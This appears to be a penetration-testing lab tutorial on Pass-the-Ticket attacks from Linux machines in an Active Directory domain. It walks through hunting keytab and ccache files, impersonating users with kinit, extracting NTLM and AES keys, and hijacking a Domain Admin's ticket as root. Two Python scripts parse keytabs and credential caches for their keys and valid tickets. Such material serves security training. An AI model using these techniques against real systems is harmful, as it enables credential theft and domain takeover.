Linux PtT
Kerberos and Linux
Even though it's less common, Linux machines can also be connected to Active Directory. The important point: a Linux machine does not need to ==join== the domain in order to use Kerberos; scripts and services on it can still request and use Kerberos tickets to authenticate to the network.
Windows and Linux machines both request TGTs and TGSs in the same manner; the difference is in how they are ==storing these tickets==. On Linux it depends on the distribution in use, but in general the tickets and keys live in two kinds of files:
ccache files: credential caches, usually residing in /tmp and readable/writable only by their owner (mode 0600). The environment variable KRB5CCNAME points at the cache currently in use when it is not in the default location (/tmp/krb5cc_<uid>...); klist shows the same path as "Ticket cache". ==A user with elevated privileges has access to these tickets.==
keytab files: used to authenticate to services in the current session without typing a password. They contain pairs of Kerberos principals and keys derived from each principal's password, which is why a keytab has to be regenerated after every password change. These files are commonly used in scripts to access Windows shares without human interaction, and they are portable: a keytab does not depend on the machine it was created on and can be copied to and used from another computer.
Identifying AD within Linux
1- realm Tool
$realm list
inlanefreight.htb
type: kerberos
realm-name: INLANEFREIGHT.HTB
domain-name: inlanefreight.htb
configured: kerberos-member
server-software: active-directory
client-software: sssd
required-package: sssd-tools
required-package: sssd
required-package: libnss-sss
required-package: libpam-sss
required-package: adcli
required-package: samba-common-bin
login-formats: %U@inlanefreight.htb
login-policy: allow-permitted-logins
permitted-logins: david@inlanefreight.htb, julio@inlanefreight.htb
permitted-groups: Linux Admins
2- Look for sssd and winbind processes
sssd and winbind are the tools commonly used to integrate a Linux host with AD; if either is running, the box is talking to a domain controller.
ps -ef | grep -i "winbind\|sssd"
Finding Kerberos Tickets
Hunting for Keytab Files
Remember that to use a keytab file you need read access to it: kinit only reads the keytab, so write permission is not required. Files that turn up in the search below are only useful if our current user can read them.
File extension lookup
find / -name "*keytab*" -ls 2>/dev/null
Cronjobs
$crontab -l
# Edit this file to introduce tasks to be run by cron.
#
<SNIP>
#
# m h dom mon dow command
*/5 * * * * /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh
carlos@inlanefreight.htb@linux01:~$ cat /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh
#!/bin/bash
kinit svc_workstations@INLANEFREIGHT.HTB -k -t /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
smbclient //dc01.inlanefreight.htb/svc_workstations -c 'ls' -k --no-pass > /home/carlos@inlanefreight.htb/script-test-results.txt
kinit is the client tool for interacting with Kerberos: it requests the user's TGT and stores it in a ccache file. A script like this is a ==target==: it hands us a keytab and tells us exactly which principal it maps to.
The secret the script relies on is a keytab, not a ticket. The host's own keytab lives by default at /etc/krb5.keytab, but scripts and cronjobs often use their own keytabs, like the one above, and those are the ones we go after.
We will use kinit to import a keytab into our session and act as that user. In the case above, the script imports svc_workstations.kt, which belongs to svc_workstations@INLANEFREIGHT.HTB.
Hunting for ccache files
While they're still valid, we can reuse these ccache files to impersonate their owner. But first let's find them:
ls -la /tmp
krb5cc_647401106_tBswau
krb5cc_647401107_Gf415d
krb5cc_647402606_qd2Pfh
Abusing keytab files
We will use two methods.
The first one imports the keytab with kinit and gives us access, in the victim's context, to the shares and services that account can reach.
The second one extracts the account's secret keys from the keytab: the RC4 key is the NTLM hash and can be used for Pass-the-Hash, the AES keys let us forge our own tickets (e.g. with Rubeus), and any of them can be handed to a cracker to recover the plaintext password and take over the account entirely :3 .
Method 1: Importing Tickets
First we need to know which user the keytab belongs to; then we can abuse it.
Extract valuable information from KeyTab files
$klist -k -t /opt/specialfiles/carlos.keytab
Keytab name: FILE:/opt/specialfiles/carlos.keytab
KVNO Timestamp Principal
---- ------------------- ------------------------------------------------------
1 10/06/2022 17:09:13 carlos@INLANEFREIGHT.HTB
Impersonating a user with KeyTab
$klist
Ticket cache: FILE:/tmp/krb5cc_647401107_r5qiuu
Default principal: david@INLANEFREIGHT.HTB
Valid starting Expires Service principal
10/06/22 17:02:11 10/07/22 03:02:11 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 10/07/22 17:02:11
This confirms that we're using David's ticket.
IMPORTANT: before importing another user's ticket, make a copy of the current session's ccache so we don't lose it later: kinit overwrites the cache it is pointed at. The path of that cache is the value of the KRB5CCNAME environment variable (and is shown by klist as "Ticket cache").
Now let's import carlos' ticket:
$kinit carlos@INLANEFREIGHT.HTB -k -t /opt/specialfiles/carlos.keytab
$klist
Ticket cache: FILE:/tmp/krb5cc_647401107_r5qiuu
Default principal: carlos@INLANEFREIGHT.HTB
Valid starting Expires Service principal
10/06/22 17:16:11 10/07/22 03:16:11 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 10/07/22 17:16:11
Now we can act as carlos and access whatever shares are intended for him:
$smbclient //dc01/carlos -k -c ls
Method 2: KeyTabExtract tool
$python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab
[+] Keytab File successfully imported.
REALM : INLANEFREIGHT.HTB
SERVICE PRINCIPAL : carlos/
NTLM HASH : a738f92b3c08b424ec2d99589a9cce60
AES-256 HASH : 42ff0baa586963d9010584eb9590595e8cd47c489e25e82aae69b1de2943007f
AES-128 HASH : fa74d5abf4061baa1d4ff8485d1261c4
It is important to note that a single keytab file can contain keys for several different principals, all in one file. Good for us. If we successfully crack the password, we can log in as the victim and collect even more keys from other keytab files used by that user's scripts or cronjobs. As an example: carlos has a cronjob that uses a keytab file named svc_workstations.kt. We can repeat the process on it, crack that password, and log in as svc_workstations.
$su - carlos@inlanefreight.htb
$ klist
Ticket cache: FILE:/tmp/krb5cc_647402606_ZX6KFA
Default principal: carlos@INLANEFREIGHT.HTB
Valid starting Expires Service principal
10/07/2022 11:01:13 10/07/2022 21:01:13 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 10/08/2022 11:01:13
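What KeyTabExtract is doing under the hood is just reading the keytab's binary format and printing the key for each enctype: the rc4-hmac key (enctype 23) is literally the NT hash, the aes256/aes128 keys are enctypes 18 and 17. The parser below is an added example written for these notes, not KeyTabExtract's or MIT's own source; it parses MIT keytab format 0x0502, handles deleted slots and the optional 32-bit kvno, and ships with a keytab constructed in-script from the hash values shown in the KeyTabExtract output above (the kvno and timestamp are assumptions).

```python
"""Parse an MIT Kerberos keytab (file format 0x0502) and pull the per-enctype
keys out of it, the way KeyTabExtract does. Example code added to these notes,
not KeyTabExtract's or MIT's own source; SAMPLE_KEYTAB is constructed below
from the hash values shown in the KeyTabExtract output above."""
import struct

# Enctype numbers (RFC 3961 / MS-KILE) and the label KeyTabExtract gives them.
# The rc4-hmac key *is* the NT hash, MD4(UTF-16LE(password)), hence "NTLM HASH".
ENCTYPE_LABELS = {
    23: "NTLM HASH",     # rc4-hmac
    18: "AES-256 HASH",  # aes256-cts-hmac-sha1-96
    17: "AES-128 HASH",  # aes128-cts-hmac-sha1-96
}


def read_counted(buf, off):
    """keytab counted_octet_string: uint16 length followed by the bytes."""
    (n,) = struct.unpack_from(">H", buf, off)
    return buf[off + 2:off + 2 + n], off + 2 + n


def parse_keytab(data):
    """Return one dict per live entry: principal, kvno, timestamp, enctype, key."""
    if data[:2] != b"\x05\x02":
        raise ValueError("only keytab format 0x0502 is supported")
    off, entries = 2, []
    while off < len(data):
        (size,) = struct.unpack_from(">i", data, off)
        off += 4
        if size < 0:                    # negative size = deleted slot, skip |size| bytes
            off += -size
            continue
        end = off + size
        (ncomp,) = struct.unpack_from(">H", data, off)
        off += 2
        realm, off = read_counted(data, off)
        comps = []
        for _ in range(ncomp):
            comp, off = read_counted(data, off)
            comps.append(comp.decode())
        # name_type(4) timestamp(4) vno8(1) enctype(2) keylen(2)
        _name_type, timestamp, vno8, enctype, keylen = struct.unpack_from(">IIBHH", data, off)
        off += 13
        key = data[off:off + keylen]
        off += keylen
        kvno = vno8
        if end - off >= 4:              # optional 32-bit kvno; a non-zero value wins
            (vno32,) = struct.unpack_from(">I", data, off)
            if vno32:
                kvno = vno32
        off = end
        entries.append({"principal": "/".join(comps) + "@" + realm.decode(),
                        "kvno": kvno, "timestamp": timestamp,
                        "enctype": enctype, "key": key})
    return entries


def extract_hashes(entries):
    """principal -> {label: hex key}, only for the enctypes AD accounts actually use."""
    out = {}
    for e in entries:
        label = ENCTYPE_LABELS.get(e["enctype"])
        if label:
            out.setdefault(e["principal"], {})[label] = e["key"].hex()
    return out


def build_keytab(principal, kvno, keys, timestamp):
    """Serialise a keytab (inverse of parse_keytab) so the example runs offline."""
    name, realm = principal.split("@")
    comps = name.split("/")
    out = bytearray(b"\x05\x02")
    for enctype, key in keys.items():
        body = bytearray(struct.pack(">H", len(comps)))
        body += struct.pack(">H", len(realm)) + realm.encode()
        for comp in comps:
            body += struct.pack(">H", len(comp)) + comp.encode()
        body += struct.pack(">IIBHH", 1, timestamp, kvno & 0xFF, enctype, len(key)) + key
        body += struct.pack(">I", kvno)                 # the optional 32-bit kvno
        out += struct.pack(">i", len(body)) + body
    return bytes(out)


# Constructed sample: carlos' keys as printed by KeyTabExtract above; kvno 1 and
# the timestamp (2022-10-06 17:09:13 UTC) are assumptions for the example.
SAMPLE_KEYTAB = build_keytab("carlos@INLANEFREIGHT.HTB", 1, {
    23: bytes.fromhex("a738f92b3c08b424ec2d99589a9cce60"),
    18: bytes.fromhex("42ff0baa586963d9010584eb9590595e8cd47c489e25e82aae69b1de2943007f"),
    17: bytes.fromhex("fa74d5abf4061baa1d4ff8485d1261c4"),
}, timestamp=1665076153)

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_KEYTAB
    for principal, hashes in extract_hashes(parse_keytab(data)).items():
        print(principal)
        for label, hexkey in hashes.items():
            print(f"  {label:13} : {hexkey}")
```

Run it with a path (e.g. python3 keytab_parse.py /opt/specialfiles/carlos.keytab) to get the same three lines per principal that KeyTabExtract prints; with no argument it parses the constructed sample. Because a keytab stores the keys and not a password, the NTLM value can go straight into a Pass-the-Hash tool without any cracking.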
Abusing ccache files
These files are located in /tmp and are readable only by their owner (mode 0600), so to use another user's ccache we need to escalate to root, which can read all of them and therefore act as any logged-in domain user on the box.
root#ls -la /tmp
-rw------- 1 julio@inlanefreight.htb krb5cc_647401106_HRJDux
-rw------- 1 julio@inlanefreight.htb krb5cc_647401106_qMKxc6
-rw------- 1 david@inlanefreight.htb krb5cc_647401107_O0oUWh
-rw------- 1 svc_workstations@inlanefreight.htb krb5cc_647401109_D7gVZF
-rw------- 1 carlos@inlanefreight.htb krb5cc_647402606
-rw------- 1 carlos@inlanefreight.htb krb5cc_647402606_ZX6KFA
To decide whose ticket is worth taking, look at the groups each target belongs to and aim for the accounts with administrative rights. If a user is in Domain Admins, their ticket gets us onto the DC. Juicy enough!
root@linux01:~# id julio@inlanefreight.htb
<SNIP>647400512(domain admins@inlanefreight.htb)<SNIP>
Importing the ccache File to the Current Session
Checking what ccache files are loaded:
root@linux01:~# klist
klist: No credentials cache found (filename: /tmp/krb5cc_0)
Note: klist displays the ticket information. We must check the "Valid starting" and "Expires" values: if the expiration date has passed, the ticket will not work. ccache files are temporary; they may change or expire when the user logs in or out, or stop being refreshed once the user no longer uses the box.
Making a copy of the ccache file to use and importing it:
root@linux01:~# cp /tmp/krb5cc_647401106_I8I133 .
root@linux01:~# export KRB5CCNAME=/root/krb5cc_647401106_I8I133
Checking the importation:
root@linux01:~# klist
Ticket cache: FILE:/root/krb5cc_647401106_I8I133
Default principal: julio@INLANEFREIGHT.HTB
Valid starting Expires Service principal
10/07/2022 13:25:01 10/07/2022 23:25:01 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 10/08/2022 13:25:01
We successfully imported the ccache file into the current session. Now we can access the victim's (Julio's, in the example above) shares, including the administrative share on the DC, since julio is a Domain Admin:
root@linux01:~# smbclient //dc01/C$ -k -c ls --no-pass
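Before exporting KRB5CCNAME to a copied cache it pays to know whether the TGT inside it is still alive, which is the "Valid starting"/"Expires" check klist does. The following is an added example for these notes (not MIT's or the page's own code) that parses the MIT FILE ccache format version 4 directly and lists the default principal and the usable TGTs; it can be pointed at any of the /tmp/krb5cc_* files above. The embedded SAMPLE_CCACHE is constructed in-script to mirror julio's klist output, with a dummy session key and ticket blob and an extra expired TGT to show the check failing.

```python
"""Parse an MIT Kerberos credential cache (FILE: ccache, format version 4) and
report the default principal and which TGTs are still usable. Example code
added to these notes, not MIT's or the page's own; SAMPLE_CCACHE is constructed
here (dummy session key and ticket blob) to mirror julio's klist output."""
import struct
import time


def read_data(buf, off):
    """ccache counted data: uint32 length followed by the bytes."""
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + n], off + 4 + n


def read_principal(buf, off):
    """uint32 name_type, uint32 ncomp, realm, then ncomp components."""
    _name_type, ncomp = struct.unpack_from(">II", buf, off)
    off += 8
    realm, off = read_data(buf, off)
    comps = []
    for _ in range(ncomp):
        comp, off = read_data(buf, off)
        comps.append(comp.decode())
    return "/".join(comps) + "@" + realm.decode(), off


def skip_tagged_list(buf, off):
    """addresses and authdata share a shape: uint32 count of (uint16 type, uint32 len, data)."""
    (count,) = struct.unpack_from(">I", buf, off)
    off += 4
    for _ in range(count):
        _type, n = struct.unpack_from(">HI", buf, off)
        off += 6 + n
    return off


def parse_ccache(data):
    """Return the default principal and one dict per stored credential."""
    if data[:2] != b"\x05\x04":
        raise ValueError("only ccache format version 4 is supported")
    (hdrlen,) = struct.unpack_from(">H", data, 2)
    off = 4 + hdrlen                          # header tags (DELTATIME etc.) are not needed
    default_principal, off = read_principal(data, off)
    creds = []
    while off < len(data):
        client, off = read_principal(data, off)
        server, off = read_principal(data, off)
        enctype, keylen = struct.unpack_from(">HI", data, off)
        off += 6 + keylen                     # skip the session key bytes
        _authtime, starttime, endtime, renew_till = struct.unpack_from(">IIII", data, off)
        off += 16
        _is_skey, flags = struct.unpack_from(">BI", data, off)
        off += 5
        off = skip_tagged_list(data, off)     # addresses
        off = skip_tagged_list(data, off)     # authdata
        ticket, off = read_data(data, off)
        _second_ticket, off = read_data(data, off)
        creds.append({"client": client, "server": server, "enctype": enctype,
                      "starttime": starttime, "endtime": endtime, "renew_till": renew_till,
                      "flags": flags, "ticket_len": len(ticket)})
    return {"default_principal": default_principal, "credentials": creds}


def usable_tgts(parsed, now=None):
    """TGTs that have started and not yet expired; anything else is dead weight for PtT."""
    now = time.time() if now is None else now
    return [c for c in parsed["credentials"]
            if c["server"].startswith("krbtgt/") and c["starttime"] <= now < c["endtime"]]


def principal_bytes(principal, name_type=1):
    name, realm = principal.split("@")
    comps = name.split("/")
    out = struct.pack(">II", name_type, len(comps)) + struct.pack(">I", len(realm)) + realm.encode()
    for comp in comps:
        out += struct.pack(">I", len(comp)) + comp.encode()
    return out


def build_ccache(default_principal, creds):
    """Inverse of parse_ccache; creds = (client, server, starttime, endtime, renew_till)."""
    header = struct.pack(">HHii", 1, 8, 0, 0)               # tag 1 (DELTATIME), 8 bytes
    out = bytearray(b"\x05\x04") + struct.pack(">H", len(header)) + header
    out += principal_bytes(default_principal)
    for client, server, start, end, renew in creds:
        out += principal_bytes(client) + principal_bytes(server, name_type=2)
        key = b"\x00" * 32                                   # dummy aes256 session key
        out += struct.pack(">HI", 18, len(key)) + key
        out += struct.pack(">IIII", start, start, end, renew)
        out += struct.pack(">BI", 0, 0x40E10000)              # is_skey, ticket flags
        out += struct.pack(">II", 0, 0)                       # no addresses, no authdata
        ticket = b"constructed-ticket-blob"
        out += struct.pack(">I", len(ticket)) + ticket + struct.pack(">I", 0)
    return bytes(out)


NOW = 1665149101  # 2022-10-07 13:25:01 UTC, the "Valid starting" in julio's klist output
SAMPLE_CCACHE = build_ccache("julio@INLANEFREIGHT.HTB", [
    ("julio@INLANEFREIGHT.HTB", "krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB",
     NOW, NOW + 10 * 3600, NOW + 24 * 3600),                  # the live TGT
    ("julio@INLANEFREIGHT.HTB", "cifs/dc01.inlanefreight.htb@INLANEFREIGHT.HTB",
     NOW, NOW + 10 * 3600, NOW + 24 * 3600),                  # a service ticket
    ("julio@INLANEFREIGHT.HTB", "krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB",
     NOW - 86400, NOW - 50400, NOW - 40000),                  # yesterday's expired TGT
])

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_CCACHE
    parsed = parse_ccache(data)
    print("Default principal:", parsed["default_principal"])
    for c in parsed["credentials"]:
        print(f"  {c['server']:50} expires {time.strftime('%Y-%m-%d %H:%M:%S', time.gmtime(c['endtime']))} UTC")
    print("usable TGTs:", len(usable_tgts(parsed, NOW if len(sys.argv) == 1 else None)))
```

Run as root with a real cache (python3 ccache_check.py /tmp/krb5cc_647401106_I8I133) and only copy and export the ones that still have a usable TGT; a cache whose only krbtgt entry has expired will just produce "ticket expired" errors from smbclient. Session keys are deliberately skipped and not printed, so the output is safe to paste into notes.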